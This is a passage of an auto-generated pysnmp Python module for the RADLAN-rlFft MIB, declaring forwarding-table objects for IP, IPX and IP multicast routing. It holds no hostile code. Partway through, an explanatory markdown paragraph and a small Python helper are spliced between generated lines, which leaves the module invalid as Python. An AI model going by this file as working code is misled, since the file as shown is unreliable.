rlIpFftSubNextHopIfindex5 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex5.setStatus('current')
rlIpFftSubNextHopIpAddr5 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 16), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr5.setStatus('current')
rlIpFftSubNextHopIfindex6 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 17), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex6.setStatus('current')
rlIpFftSubNextHopIpAddr6 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 18), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr6.setStatus('current')
rlIpFftSubNextHopIfindex7 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex7.setStatus('current')
rlIpFftSubNextHopIpAddr7 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 20), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr7.setStatus('current')
rlIpFftSubNextHopIfindex8 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 21), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex8.setStatus('current')
rlIpFftSubNextHopIpAddr8 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 22), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr8.setStatus('current')
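The eight `rlIpFftSubNextHopIfindexN`/`rlIpFftSubNextHopIpAddrN` column pairs above are a fixed-size array flattened into numbered columns, a common SMIv2 pattern. A reader-side sketch (hypothetical key names) that regroups such a row into a list of (ifindex, ip) pairs, bounded by the value of `rlIpFftSubNextHopCount`:

```python
def collect_next_hops(row, count):
    # Regroup numbered ifindexN/ipaddrN keys into (ifindex, ip) tuples.
    return [(row[f'ifindex{i}'], row[f'ipaddr{i}']) for i in range(1, count + 1)]

# Illustrative row with two valid next hops out of the eight slots.
sample_row = {
    'ifindex1': 49, 'ipaddr1': '10.0.0.1',
    'ifindex2': 50, 'ipaddr2': '10.0.0.2',
}
```

Here `collect_next_hops(sample_row, 2)` returns the two populated pairs and ignores the unused slots.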
rlIpFftCountersTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 1, 15), )
if mibBuilder.loadTexts: rlIpFftCountersTable.setStatus('current')
rlIpFftCountersEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 1, 15, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpFftCountersIndex"))
if mibBuilder.loadTexts: rlIpFftCountersEntry.setStatus('current')
rlIpFftCountersIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 15, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftCountersIndex.setStatus('current')
rlIpFftInReceives = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 15, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftInReceives.setStatus('current')
rlIpFftForwDatagrams = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 15, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftForwDatagrams.setStatus('current')
rlIpFftInDiscards = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 15, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftInDiscards.setStatus('current')
rlIpFftNextHopTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 1, 16), )
if mibBuilder.loadTexts: rlIpFftNextHopTable.setStatus('current')
rlIpFftNextHopEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpFftNextHopifindex"), (0, "RADLAN-rlFft", "rlIpFftNextHopIpAddress"))
if mibBuilder.loadTexts: rlIpFftNextHopEntry.setStatus('current')
rlIpFftNextHopifindex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopifindex.setStatus('current')
rlIpFftNextHopIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopIpAddress.setStatus('current')
rlIpFftNextHopValid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("valid", 1), ("invalid", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopValid.setStatus('current')
rlIpFftNextHopType = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("local", 1), ("remote", 2), ("reject", 3), ("drop", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopType.setStatus('current')
rlIpFftNextHopReferenceCount = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopReferenceCount.setStatus('current')
rlIpFftNextHopNetAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 6), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopNetAddress.setStatus('current')
rlIpFftNextHopVid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopVid.setStatus('current')
rlIpFftNextHopMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 8), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopMacAddress.setStatus('current')
rlIpFftNextHopOutIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 16, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNextHopOutIfIndex.setStatus('current')
rlIpFftL2InfoTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 1, 17), )
if mibBuilder.loadTexts: rlIpFftL2InfoTable.setStatus('current')
rlIpFftL2InfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpFftL2InfoIfindex"), (0, "RADLAN-rlFft", "rlIpFftL2InfoDstMacAddress"))
if mibBuilder.loadTexts: rlIpFftL2InfoEntry.setStatus('current')
rlIpFftL2InfoIfindex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoIfindex.setStatus('current')
rlIpFftL2InfoDstMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 2), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoDstMacAddress.setStatus('current')
rlIpFftL2InfoValid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("valid", 1), ("invalid", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoValid.setStatus('current')
rlIpFftL2InfoType = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("other", 1), ("vlan", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoType.setStatus('current')
rlIpFftL2InfoReferenceCount = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoReferenceCount.setStatus('current')
rlIpFftL2InfoVid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoVid.setStatus('current')
rlIpFftL2InfoSrcMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 7), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoSrcMacAddress.setStatus('current')
rlIpFftL2InfoOutIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoOutIfIndex.setStatus('current')
rlIpFftL2InfoTaggedMode = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 17, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("untagged", 1), ("tagged", 2), ("basedPortConfig", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftL2InfoTaggedMode.setStatus('current')
rlIpxFFT = MibIdentifier((1, 3, 6, 1, 4, 1, 89, 47, 2))
rlIpxFftMibVersion = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftMibVersion.setStatus('current')
rlIpxMaxFftNumber = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxMaxFftNumber.setStatus('current')
rlIpxFftDynamicSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftDynamicSupported.setStatus('current')
rlIpxFftNetworkSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftNetworkSupported.setStatus('current')
rlIpxFftUnknownAddrMsgUsed = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("used", 1), ("unused", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftUnknownAddrMsgUsed.setStatus('current')
rlIpxFftAgingTimeSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftAgingTimeSupported.setStatus('current')
rlIpxFftSrcAddrSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSrcAddrSupported.setStatus('current')
rlIpxFftAgingTimeout = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 8), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rlIpxFftAgingTimeout.setStatus('current')
rlIpxFftRedBoundary = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 100))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rlIpxFftRedBoundary.setStatus('current')
rlIpxFftYellowBoundary = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 2, 10), Percents()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rlIpxFftYellowBoundary.setStatus('current')
rlIpxFftNumTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 2, 12), )
if mibBuilder.loadTexts: rlIpxFftNumTable.setStatus('current')
rlIpxFftNumEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 2, 12, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpxFftNumIndex"))
if mibBuilder.loadTexts: rlIpxFftNumEntry.setStatus('current')
rlIpxFftNumIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 12, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftNumIndex.setStatus('current')
rlIpxFftNumStnRoutesNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 12, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftNumStnRoutesNumber.setStatus('current')
rlIpxFftNumSubRoutesNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 12, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftNumSubRoutesNumber.setStatus('current')
rlIpxFftStnTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 2, 13), )
if mibBuilder.loadTexts: rlIpxFftStnTable.setStatus('current')
rlIpxFftStnEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpxFftStnIndex"), (0, "RADLAN-rlFft", "rlIpxFftStnDstNetid"), (0, "RADLAN-rlFft", "rlIpxFftStnDstNode"), (0, "RADLAN-rlFft", "rlIpxFftStnSrcNetid"), (0, "RADLAN-rlFft", "rlIpxFftStnSrcNode"))
if mibBuilder.loadTexts: rlIpxFftStnEntry.setStatus('current')
rlIpxFftStnIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnIndex.setStatus('current')
rlIpxFftStnDstNetid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 2), NetNumber()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnDstNetid.setStatus('current')
rlIpxFftStnDstNode = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 3), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnDstNode.setStatus('current')
rlIpxFftStnSrcNetid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 4), NetNumber()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnSrcNetid.setStatus('current')
rlIpxFftStnSrcNode = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 5), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnSrcNode.setStatus('current')
rlIpxFftStnDstIpxAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("local", 1), ("remote", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnDstIpxAddrType.setStatus('current')
rlIpxFftStnEncapsulation = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("novell", 1), ("ethernet", 2), ("llc", 3), ("snap", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnEncapsulation.setStatus('current')
rlIpxFftStnDstMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 8), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnDstMacAddress.setStatus('current')
rlIpxFftStnSrcMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 9), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnSrcMacAddress.setStatus('current')
rlIpxFftStnOutIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnOutIfIndex.setStatus('current')
rlIpxFftStnTci = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnTci.setStatus('current')
rlIpxFftStnFacsIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnFacsIndex.setStatus('current')
rlIpxFftStnAge = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 13, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftStnAge.setStatus('current')
rlIpxFftSubTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 2, 14), )
if mibBuilder.loadTexts: rlIpxFftSubTable.setStatus('current')
rlIpxFftSubEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpxFftSubIndex"), (0, "RADLAN-rlFft", "rlIpxFftSubDstNetid"))
if mibBuilder.loadTexts: rlIpxFftSubEntry.setStatus('current')
rlIpxFftSubIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubIndex.setStatus('current')
rlIpxFftSubDstNetid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 2), NetNumber()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubDstNetid.setStatus('current')
rlIpxFftSubEncapsulation = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("novell", 1), ("ethernet", 2), ("llc", 3), ("snap", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubEncapsulation.setStatus('current')
rlIpxFftSubDstMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 4), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubDstMacAddress.setStatus('current')
rlIpxFftSubSrcMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 5), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubSrcMacAddress.setStatus('current')
rlIpxFftSubOutIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubOutIfIndex.setStatus('current')
rlIpxFftSubTci = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubTci.setStatus('current')
rlIpxFftSubFacsIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubFacsIndex.setStatus('current')
rlIpxFftSubAge = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 14, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftSubAge.setStatus('current')
rlIpxFftCountersTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 2, 15), )
if mibBuilder.loadTexts: rlIpxFftCountersTable.setStatus('current')
rlIpxFftCountersEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 2, 15, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpxFftCountersIndex"))
if mibBuilder.loadTexts: rlIpxFftCountersEntry.setStatus('current')
rlIpxFftCountersIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 15, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftCountersIndex.setStatus('current')
rlIpxFftInReceives = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 15, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftInReceives.setStatus('current')
rlIpxFftForwDatagrams = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 15, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftForwDatagrams.setStatus('current')
rlIpxFftInDiscards = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 2, 15, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpxFftInDiscards.setStatus('current')
rlIpmFFT = MibIdentifier((1, 3, 6, 1, 4, 1, 89, 47, 3))
rlIpmFftMibVersion = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 3, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftMibVersion.setStatus('current')
rlIpmMaxFftNumber = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 3, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmMaxFftNumber.setStatus('current')
rlIpmFftDynamicSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 3, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftDynamicSupported.setStatus('current')
rlIpmFftUnknownAddrMsgUsed = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 3, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("used", 1), ("unused", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftUnknownAddrMsgUsed.setStatus('current')
rlIpmFftUserAgingTimeout = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 3, 5), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rlIpmFftUserAgingTimeout.setStatus('current')
rlIpmFftRouterAgingTimeout = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 3, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftRouterAgingTimeout.setStatus('current')
rlIpmFftNumTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 3, 8), )
if mibBuilder.loadTexts: rlIpmFftNumTable.setStatus('current')
rlIpmFftNumEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 3, 8, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpmFftNumIndex"))
if mibBuilder.loadTexts: rlIpmFftNumEntry.setStatus('current')
rlIpmFftNumIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 8, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftNumIndex.setStatus('current')
rlIpmFftNumRoutesNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 8, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftNumRoutesNumber.setStatus('current')
rlIpmFftTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 3, 9), )
if mibBuilder.loadTexts: rlIpmFftTable.setStatus('current')
rlIpmFftEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpmFftIndex"), (0, "RADLAN-rlFft", "rlIpmFftSrcIpAddress"), (0, "RADLAN-rlFft", "rlIpmFftDstIpAddress"))
if mibBuilder.loadTexts: rlIpmFftEntry.setStatus('current')
rlIpmFftIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftIndex.setStatus('current')
rlIpmFftSrcIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftSrcIpAddress.setStatus('current')
rlIpmFftDstIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftDstIpAddress.setStatus('current')
rlIpmFftSrcIpMask = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 4), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftSrcIpMask.setStatus('current')
rlIpmFftInputIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftInputIfIndex.setStatus('current')
rlIpmFftInputVlanTag = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftInputVlanTag.setStatus('current')
rlIpmFftForwardAction = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("forward", 1), ("discard", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftForwardAction.setStatus('current')
rlIpmFftInportAction = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("sentToCPU", 1), ("discard", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftInportAction.setStatus('current')
rlIpmFftAge = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftAge.setStatus('current')
rlIpmFftPortTagTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 3, 10), )
if mibBuilder.loadTexts: rlIpmFftPortTagTable.setStatus('current')
rlIpmFftPortTagEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 3, 10, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpmFftPortIndex"), (0, "RADLAN-rlFft", "rlIpmFftPortSrcIpAddress"), (0, "RADLAN-rlFft", "rlIpmFftPortDstIpAddress"), (0, "RADLAN-rlFft", "rlIpmFftPortOutputifIndex"), (0, "RADLAN-rlFft", "rlIpmFftPortOutputTag"))
if mibBuilder.loadTexts: rlIpmFftPortTagEntry.setStatus('current')
rlIpmFftPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 10, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftPortIndex.setStatus('current')
rlIpmFftPortSrcIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 10, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftPortSrcIpAddress.setStatus('current')
rlIpmFftPortDstIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 10, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftPortDstIpAddress.setStatus('current')
rlIpmFftPortOutputifIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 10, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftPortOutputifIndex.setStatus('current')
rlIpmFftPortOutputTag = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 10, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftPortOutputTag.setStatus('current')
rlIpmFftCountersTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 3, 11), )
if mibBuilder.loadTexts: rlIpmFftCountersTable.setStatus('current')
rlIpmFftCountersEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 3, 11, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpmFftCountersIndex"))
if mibBuilder.loadTexts: rlIpmFftCountersEntry.setStatus('current')
rlIpmFftCountersIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 11, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftCountersIndex.setStatus('current')
